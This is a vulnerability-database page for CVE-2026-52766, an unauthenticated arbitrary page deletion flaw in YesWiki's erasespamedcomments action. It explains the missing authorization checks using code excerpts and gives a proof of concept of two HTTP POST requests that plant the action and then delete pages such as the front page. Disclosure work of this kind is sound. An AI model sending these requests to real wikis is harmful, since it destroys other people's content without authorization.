CVE-2026-52766

CRITICALPre-NVD 9.19.1
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.1 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
9.1
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 9.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

YesWiki vulnerable to unauthenticated arbitrary page deletion via {{erasespamedcomments}} action

Summary

The {{erasespamedcomments}} wiki action (actions/EraseSpamedCommentsAction.php) accepts a suppr[] array from POST and deletes every wiki page whose tag appears in that array, with no authorization check anywhere in the action body or in the page-deletion path it invokes. Combined with YesWiki's allow-by-default action ACL model, any user who has page write access, which is the default for everyone (default_write_acl='*') on a fresh install can permanently delete arbitrary wiki pages, including the front page, admin pages, and pages owned by other users.

The action's delete() callee is PageManager::deleteOrphaned(), which despite its name does not check whether the target page is orphaned: it issues an unconditional DELETE against pages, links, acls, triples, referrers, and tags tables.

Details

Three issues compose the vulnerability.

  • actions/EraseSpamedCommentsAction.php performs no authorization check before processing $_POST['clean'] / $_POST['suppr'][] in actions/EraseSpamedCommentsAction.php:

public function run()
   {
       $wiki = &$this->wiki;
       ob_start();
       // ...
       elseif (isset($_POST['clean'])) {              
           $deletedPages = '';
           if (!empty($_POST['suppr'])) {            
               foreach ($_POST['suppr'] as $page) {
                   echo 'Effacement de : ' . $page . "\n";
                   if ($wiki->services->get(PageController::class)->delete($page)) {  
                       $deletedPages .= $page . ', ';
                   }
               }
           }
           
       }
   }

No UserIsAdmin(), no UserIsOwner(), no HasAccess('write', $page) per-target check, no CSRF token check.

  • The default action ACL grants access to everyone in includes/YesWiki.php:

$acl = empty($this->config['permissions'][$moduleType][$module])
       ? '*'
       : $this->config['permissions'][$moduleType][$module];

if ($acl === null) { return true; }
   return $this->CheckACL($acl, $user);

No shipped permissions map gates erasespamedcomments to admins, so Performer::CheckModuleACL('erasespamedcomments', 'action') returns true for anonymous users.

  • PageController::delete() and PageManager::deleteOrphaned() perform no authorization check and do not validate that the page is actually orphaned in includes/controllers/PageController.php:38–48:

public function delete(string $tag): bool
   {
       if ($this->entryManager->isEntry($tag)) {
           return $this->entryController->delete($tag);
       } else {
           $this->pageManager->deleteOrphaned($tag);
           $this->wiki->LogAdministrativeAction(
               $this->authController->getLoggedUserName(),
               'Suppression de la page ->""' . $tag . '""'
           );
           return true;
       }
   }
in includes/services/PageManager.php:289–310:
public function deleteOrphaned($tag)
   {
       if ($this->securityController->isWikiHibernated()) { throw new \Exception(_t('WIKI_IN_HIBERNATION')); }
       unset($this->ownersCache[$tag]);
       if (in_array($tag, $this->pageCache)) { unset($this->pageCache[$tag]); }
       $this->dbService->query("DELETE FROM ... WHERE tag='{$this->dbService->escape($tag)}' OR comment_on='{$this->dbService->escape($tag)}'");
       $this->dbService->query("DELETE FROM ...links... WHERE from_tag='{$this->dbService->escape($tag)}' ");
       $this->dbService->query("DELETE FROM ...acls... WHERE page_tag='{$this->dbService->escape($tag)}' ");
       // ...further unconditional DELETEs across triples, referrers, tags
   }

The companion isOrphaned() method (line 284) exists but is never called from deleteOrphaned(). The function name is misleading as it deletes any page, not just orphans.

PoC

Default fresh install where default_write_acl='*' (per includes/YesWikiInit.php:219), anonymous browsing.

  • create a trigger page (anonymous)

POST /?wiki=SpamCleanup/edit HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded

body=%7B%7Berasespamedcomments%7D%7D&submit=1

This succeeds because the new page passes aclService->hasAccess('write', 'SpamCleanup') against default_write_acl='*'.

  • trigger arbitrary page deletion (anonymous)

POST /?wiki=SpamCleanup HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded

clean=yes&suppr%5B0%5D=PagePrincipale&suppr%5B1%5D=AnotherTargetPage

Server response includes Effacement de : PagePrincipale and Effacement de : AnotherTargetPage. pages, links, acls, triples, referrers, and tags rows for those tags are deleted from the database.

Impact

Arbitrary page deletion, including the front page (PagePrincipale).

CVSS v3
9.1
EG Score
9.1(low)
EPSS
KEV
Not listed

Published

July 9, 2026

Last Modified

July 9, 2026

Vendor Advisories for CVE-2026-52766(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 37× in last 7d / 37× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-16 01:25 UTCEG score recompute
  2. 2026-07-15 21:19 UTCEG score recompute
  3. 2026-07-15 17:14 UTCEG score recompute
  4. 2026-07-15 13:06 UTCEG score recompute
  5. 2026-07-15 09:00 UTCEG score recompute
  6. 2026-07-15 04:54 UTCEG score recompute
  7. 2026-07-15 00:47 UTCEG score recompute
  8. 2026-07-14 20:42 UTCEG score recompute
  9. 2026-07-14 16:36 UTCEG score recompute
  10. 2026-07-14 12:30 UTCEG score recompute
  11. 2026-07-14 08:22 UTCEG score recompute
  12. 2026-07-14 04:15 UTCEG score recompute
  13. 2026-07-14 00:10 UTCEG score recompute
  14. 2026-07-13 20:04 UTCEG score recompute
  15. 2026-07-13 15:58 UTCEG score recompute
  16. 2026-07-13 11:52 UTCEG score recompute
  17. 2026-07-13 07:47 UTCEG score recompute
  18. 2026-07-13 03:41 UTCEG score recompute
  19. 2026-07-12 23:36 UTCEG score recompute
  20. 2026-07-12 19:31 UTCEG score recompute
  21. 2026-07-12 15:25 UTCEG score recompute
  22. 2026-07-12 11:20 UTCEG score recompute
  23. 2026-07-12 07:14 UTCEG score recompute
  24. 2026-07-12 03:08 UTCEG score recompute
  25. 2026-07-11 23:00 UTCEG score recompute
Show 12 more
  1. 2026-07-11 18:54 UTCEG score recompute
  2. 2026-07-11 14:49 UTCEG score recompute
  3. 2026-07-11 10:42 UTCEG score recompute
  4. 2026-07-11 06:37 UTCEG score recompute
  5. 2026-07-11 02:31 UTCEG score recompute
  6. 2026-07-10 22:25 UTCEG score recompute
  7. 2026-07-10 18:16 UTCEG score recompute
  8. 2026-07-10 14:10 UTCEG score recompute
  9. 2026-07-10 10:02 UTCEG score recompute
  10. 2026-07-10 05:57 UTCEG score recompute
  11. 2026-07-10 01:51 UTCEG score recompute
  12. 2026-07-09 21:46 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-52766?
CVE-2026-52766 is a critical vulnerability published on July 9, 2026. YesWiki vulnerable to unauthenticated arbitrary page deletion via {{erasespamedcomments}} action Summary The {{erasespamedcomments}} wiki action (actions/EraseSpamedCommentsAction.php) accepts a suppr[] array from POST and deletes every wiki page whose tag appears in that array, with no…
When was CVE-2026-52766 disclosed?
CVE-2026-52766 was first published in the National Vulnerability Database on July 9, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-52766?
CVE-2026-52766 has a CVSS v4.0 base score of 9.1 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-52766?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-52766, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-52766

Explore →

Is Your Infrastructure Affected by CVE-2026-52766?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.